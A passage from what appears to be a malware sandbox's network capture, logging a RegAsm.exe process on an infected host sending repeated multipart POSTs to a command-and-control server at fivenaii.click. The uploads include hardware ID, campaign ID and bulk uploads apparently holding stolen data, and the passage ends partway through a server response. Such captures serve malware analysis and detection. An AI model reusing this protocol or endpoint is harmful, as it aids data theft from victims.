                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8771
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:27 UTC8771OUTData Raw: 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d
                                                                                              Data Ascii: --CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="pid"2--CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--
                                                                                              2024-12-27 21:33:28 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=hb8gvgqr93hb25s2mf96gqcrqm; expires=Tue, 22 Apr 2025 15:20:07 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2BE7RA2WUiXaH5YVpF16G2LeouFbiH4VdP6HnSCdKU%2BdsKOdYVdl2pxX0rZIHEAQmjoV%2FWmRwHJoLBd16AEXdZGtZpMnlTyUwYNfXpqHNr1uz74jHoVJ%2FUArwxJ952h4Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dd8dbb642a0-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1577&rtt_var=611&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9705&delivery_rate=1764350&cwnd=225&unsent_bytes=0&cid=22e6ede5bd1afcd1&ts=841&x=0"
                                                                                              2024-12-27 21:33:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              17 | 192.168.2.4 | 49765 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:27 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=NK6VN6CQ4BZSATYGE
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571134
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74
                                                                                              Data Ascii: --NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="pid"1--NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="lid"VC6Dfm--TestOtct
                                                                                              2024-12-27 21:33:30 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=sa8pss3mteljm797ofbhllpf11; expires=Tue, 22 Apr 2025 15:20:08 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FkrFrS3SlD%2FAu7i8zLMCCLTVsgOAL8gy6hVCkE6gKtLq6cLTGDcMTjPokziy3x6ixg9O%2FdrjoUYSoqHB5yjeqef4PhaSy6OxxsEOPvKtIlY0KqqX%2FhHiJBfV0eF38F1vVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dd97c4ff793-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1675&rtt_var=684&sent=211&recv=590&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573678&delivery_rate=1536842&cwnd=152&unsent_bytes=0&cid=093b464db77e83b8&ts=2354&x=0"


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              18 | 192.168.2.4 | 49766 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:30 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=XMTXEG4X2SM0IQWLM8F
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20448
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:30 UTC15331OUTData Raw: 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 4d 54 58 45 47 34 58 32 53 4d 30 49 51 57 4c 4d 38 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65
                                                                                              Data Ascii: --XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="pid"3--XMTXEG4X2SM0IQWLM8FContent-Disposition: form-data; name="lid"VC6Dfm--Te
                                                                                              2024-12-27 21:33:30 UTC5117OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~
                                                                                              2024-12-27 21:33:31 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=fhlnsd2126hhmb9f1juk6v6os0; expires=Tue, 22 Apr 2025 15:20:09 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axBNTDTG4qEYlasEmtRNcXJ2rObzr1bv01YoS%2F%2BFUlJI5b1LMykVRfu3NtoAOpvHHETlrUvaWLdN4ZgMvnueJaF0O6qA4PLR0SKjT7AESiEPJPXiJvUzhvYmxpAyFY93yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6de8fd984368-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1651&rtt_var=638&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21409&delivery_rate=1689814&cwnd=233&unsent_bytes=0&cid=98277ed075e584d7&ts=903&x=0"
                                                                                              2024-12-27 21:33:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              19 | 192.168.2.4 | 49767 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:31 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:31 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:32 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6ugm2m9t5b0p84fhrccjhh5n97; expires=Tue, 22 Apr 2025 15:20:11 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3brHd0p12uSRVdf%2FFox%2BuA7bcsmQIsDZfNamAv9Kq9McC3UJ%2FxN3mJabeWD7uznD3nPyDttW4wzwzxN2RHzNtqxhmvdSGOvDr8%2Fs12BmO3ffsheyofJeJQ%2FmsnNpkiBalg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6df1fc907cee-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2007&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1416100&cwnd=176&unsent_bytes=0&cid=30afc07c4037611e&ts=1084&x=0"
                                                                                              2024-12-27 21:33:32 UTC | 54 | IN | Data Raw: 33 30 0d 0a 61 78 65 2f 56 33 57 44 38 2f 2f 55 48 4f 43 46 6d 42 57 69 34 69 77 4f 71 62 45 75 6f 6e 2b 53 67 6e 6d 79 62 56 41 2f 51 69 45 77 53 67 3d 3d 0d 0a
                                                                                              Data Ascii: 30axe/V3WD8//UHOCFmBWi4iwOqbEuon+SgnmybVA/QiEwSg==
                                                                                              2024-12-27 21:33:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              20 | 192.168.2.4 | 49768 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:33 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=5Q02JBRDU7U42EA
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1231
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:33 UTC1231OUTData Raw: 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 51 30 32 4a 42 52 44 55 37 55 34 32 45 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d
                                                                                              Data Ascii: --5Q02JBRDU7U42EAContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--5Q02JBRDU7U42EAContent-Disposition: form-data; name="pid"1--5Q02JBRDU7U42EAContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--
                                                                                              2024-12-27 21:33:33 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=2961mel39jv51m3357rbrppf0p; expires=Tue, 22 Apr 2025 15:20:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pdmvEnhT5m%2FlT2wCn73Q6NBRcXX35ceR3q%2Fs5KO0eD0eO5ky%2FS98w83zXfEFGHARcYQpXDQaTUx4I6QXFg6Pvk1T62SI0zb1l%2BRkQt%2F5m%2Fl9e83kkJ4085B%2FNBXLIVYbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dfac9f043f7-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1715&rtt_var=650&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2143&delivery_rate=1702623&cwnd=213&unsent_bytes=0&cid=fb4511f71de65859&ts=806&x=0"
                                                                                              2024-12-27 21:33:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              21 | 192.168.2.4 | 49769 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:33 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6DGF095Y82K79M6X
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18156
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:33 UTC15331OUTData Raw: 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 44 47 46 30 39 35 59 38 32 4b 37 39 4d 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d
                                                                                              Data Ascii: --6DGF095Y82K79M6XContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--6DGF095Y82K79M6XContent-Disposition: form-data; name="pid"2--6DGF095Y82K79M6XContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk
                                                                                              2024-12-27 21:33:33 UTC2825OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                              Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                              2024-12-27 21:33:34 UTC | 1140 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=g6a09jg3c8f8j2n97ohah64shq; expires=Tue, 22 Apr 2025 15:20:12 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSHSwwUKPceMTDvapwPU5HKACaVO73D2O3a28d6a%2BetcJNeUHCYkut7nmxHYR0Vbs%2FJHdEBCW%2BEGilv%2FEGI6WtBba%2BsneYy2gAldr7Xruy%2Bikpo%2Fi4%2FRd99SnyN3qmPXrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dfabe1b32d3-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1945&rtt_var=736&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=19114&delivery_rate=1479229&cwnd=146&unsent_bytes=0&cid=ee72e2abe7474ddd&ts=1014&x=0"
                                                                                              2024-12-27 21:33:34 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              22 | 192.168.2.4 | 49770 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:35 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=FRHHII88EX2SEMY7YY
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8789
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:35 UTC8789OUTData Raw: 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 52 48 48 49 49 38 38 45 58 32 53 45 4d 59 37 59 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f
                                                                                              Data Ascii: --FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="pid"2--FRHHII88EX2SEMY7YYContent-Disposition: form-data; name="lid"VC6Dfm--TestO
                                                                                              2024-12-27 21:33:36 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:35 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
